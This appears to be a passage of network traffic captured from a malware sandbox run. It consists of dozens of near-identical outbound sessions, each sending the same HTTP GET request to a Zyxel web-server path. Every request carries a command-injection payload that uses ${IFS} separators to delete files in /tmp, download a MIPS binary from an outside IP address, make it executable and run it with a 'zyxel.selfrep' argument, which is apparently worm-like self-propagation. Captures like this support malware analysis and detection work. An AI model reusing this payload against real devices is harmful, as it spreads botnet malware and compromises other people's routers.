                                      Jan 14, 2024 15:50:51.422377110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5529192.168.2.1443464188.220.108.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.422446966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5530192.168.2.1436326193.176.2.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.422487020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5531192.168.2.143672879.48.248.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.422553062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5532192.168.2.1459262112.11.0.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.422590971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5533192.168.2.1434870211.188.230.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.422650099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5534192.168.2.1435450101.44.21.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.422689915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5535192.168.2.146060478.150.189.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.422725916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5536192.168.2.1433536129.32.58.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.422764063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5537192.168.2.1445608134.27.208.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.422830105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5538192.168.2.1455732211.227.127.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.422873974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5539192.168.2.1436838221.205.10.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.422923088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5540192.168.2.145713836.140.249.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.422969103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5541192.168.2.144209054.150.145.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.423032999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5542192.168.2.1442126100.24.75.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.423085928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5543192.168.2.1450502136.60.249.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.423113108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5544192.168.2.143686257.142.139.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.423129082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5545192.168.2.1438450194.56.169.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.423182011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5546192.168.2.144605493.211.217.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.423237085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5547192.168.2.1442802184.225.240.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.423266888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5548192.168.2.143759632.255.65.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.423332930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5549192.168.2.1458126204.174.220.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.423391104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5550192.168.2.1451452160.163.124.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.423427105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5551192.168.2.145936659.88.73.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.423474073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5552192.168.2.145014898.20.245.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.423513889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5553192.168.2.1444822141.156.247.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.423568964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5554192.168.2.145430286.156.213.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.423595905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5555192.168.2.1435626160.70.164.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.423664093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5556192.168.2.1435386183.82.176.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.423686028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5557192.168.2.1445234112.148.88.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.423743010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5558192.168.2.143449480.101.117.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.423808098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5559192.168.2.1451742184.223.179.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.423842907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5560192.168.2.1458738169.167.157.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.423893929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5561192.168.2.1447394111.188.187.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.423974037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5562192.168.2.1445930162.145.181.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.423999071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5563192.168.2.1433944159.34.120.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.424068928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5564192.168.2.1455786194.229.69.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.424098015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5565192.168.2.1438938136.8.21.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.424163103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5566192.168.2.144401875.8.42.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.424187899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5567192.168.2.1442972176.198.241.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.424251080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5568192.168.2.145465832.73.133.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.424300909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5569192.168.2.1447848220.236.111.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.424338102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5570192.168.2.145002072.243.112.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.424361944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5571192.168.2.1459222196.28.204.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.424426079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5572192.168.2.14502304.65.124.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.424474955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5573192.168.2.1449024191.234.1.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.424535036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5574192.168.2.1436502155.246.50.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.424561024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5575192.168.2.143629465.177.200.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.424611092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5576192.168.2.1436942154.235.252.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.424659014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5577192.168.2.1438350210.240.69.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.424732924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5578192.168.2.1451912147.21.231.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.424774885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5579192.168.2.145574627.137.166.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.424809933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5580192.168.2.1447594148.168.222.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.424855947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5581192.168.2.144006866.29.190.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.424930096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5582192.168.2.1433868177.23.174.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.425002098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5583192.168.2.1457714171.137.0.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.425031900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5584192.168.2.1443568223.174.233.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.425080061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5585192.168.2.1447418111.169.116.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.425120115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5586192.168.2.144233632.67.144.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.425165892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5587192.168.2.146033476.69.88.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.425208092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5588192.168.2.1439182187.153.84.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.425262928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5589192.168.2.1459972110.159.123.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.425314903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5590192.168.2.144993664.144.19.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.425349951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5591192.168.2.144271464.36.99.226443
                                      TimestampBytes transferredDirectionData
